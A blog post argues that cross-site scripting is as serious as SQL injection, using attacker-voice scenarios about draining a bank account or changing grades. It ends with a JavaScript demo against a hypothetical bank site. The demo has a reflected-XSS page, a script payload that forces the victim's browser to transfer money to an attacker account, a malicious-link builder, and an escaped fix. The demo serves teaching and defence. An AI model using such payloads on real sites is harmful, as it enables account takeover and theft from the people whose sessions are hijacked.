Recently RSnake wrote an article on the seriousness of XSS, because a lot of people are asking him what the worst thing XSS can do is. He goes on about how it can be used for sophisticated cross-domain, exponentially spreading attacks, but he doesn't say much about the underlying problem: why are people asking this question in the first place?
In my experience people don't see XSS as a problem. That is because the people who should care about it are system administrators and/or programmers, the same people who think Linux is safe because each user can only fuck up his own files. And that is the fundamental problem! Sure, a user can only fuck up his own files, but those are the only files that matter to the user. The user couldn't care less if the system's emacs binary gets crippled, because everything in the system is easy to replace; the user's files are not.
It's the same with XSS versus SQL injection. SQL injection is seen as a serious problem because you can attack the system. But you don't need to attack the system; attacking the client is enough. Let's say I want to hack a bank because I'm short of money. Of course, if I could do SQL injection (let's say this bank uses a MySQL database ;) ) I could change some of the amounts and end up with a lot more money.
However, I don't really need 5 million euros; I'll settle for a few thousand. If I can hack just one account and make one user transfer money to my account, wouldn't that be enough? Similarly, if I'm a student and I want to change my grades, I only need to hack the teacher's account. These are exactly the kind of attacks most easily done with XSS. You only need to find one XSS hole somewhere on the site and then social-engineer someone into clicking a link (which doesn't even have to point to the site itself; it can go through a redirect), or, if you're lucky, you can use persistent XSS and skip the link entirely. And almost all sites I know of are full of XSS, while fewer and fewer have SQL injection holes.
So what can you do with XSS? Anything the person you are hacking can do.
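To make the bank scenario above concrete, here is an added example (not code from the original post or from any real site): a reflected XSS in a search page, the payload that makes the victim's own browser submit a transfer with the victim's own session, and the same page with output encoding applied. The origin `https://bank.example`, the `/search` and `/transfer` routes, the `q`, `to` and `amount` parameters and the account placeholder are all hypothetical.

```javascript
// Added example, not from the original post. Everything here is constructed:
// the page, the routes (/search, /transfer), the parameter names and the
// account number are hypothetical and exist only to illustrate the post's point.

// Vulnerable: the search term is concatenated straight into the HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Encode the five characters that can break out of an HTML text or
// quoted-attribute context. This is only correct for those two contexts;
// data placed inside <script>, a URL or a CSS value needs different encoding.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened: the same page, with the user input encoded for the context it lands in.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// The post's scenario: once this runs in the victim's browser it posts a
// transfer from the victim's account. The request is same-origin, so the
// browser attaches the victim's session cookie by itself; the attacker never
// needs the password. Endpoint and field names are hypothetical.
const TRANSFER_PAYLOAD =
  `<script>fetch('/transfer',{method:'POST',credentials:'include',` +
  `headers:{'Content-Type':'application/x-www-form-urlencoded'},` +
  `body:'to=ATTACKER-ACCOUNT&amount=2000'})</script>`;

// The attacker only has to get the victim to open this link (directly or via a
// redirect, as the post notes); the vulnerable site does the rest.
function buildReflectedXssLink(origin, payload) {
  return `${origin}/search?q=${encodeURIComponent(payload)}`;
}

// Mimic the server: read q from the request URL and render the page with it.
function serveSearch(render, url) {
  const q = new URL(url).searchParams.get('q') || '';
  return render(q);
}

// Would a <script> element reach the browser as live markup (and so execute)?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

const link = buildReflectedXssLink('https://bank.example', TRANSFER_PAYLOAD);
const vulnerablePage = serveSearch(renderSearchVulnerable, link);
const safePage = serveSearch(renderSearchSafe, link);

console.log('vulnerable page runs the payload:', containsLiveScript(vulnerablePage)); // true
console.log('hardened page runs the payload:  ', containsLiveScript(safePage));       // false
```

The hardened page still shows the attacker's text to the user, just as inert text; encoding at the point of output, for the exact context the data lands in, is what stops the payload, not any filtering of the input. Note that the payload does nothing the victim could not do by hand, which is exactly the post's point: the attacker inherits the victim's authority, not the server's.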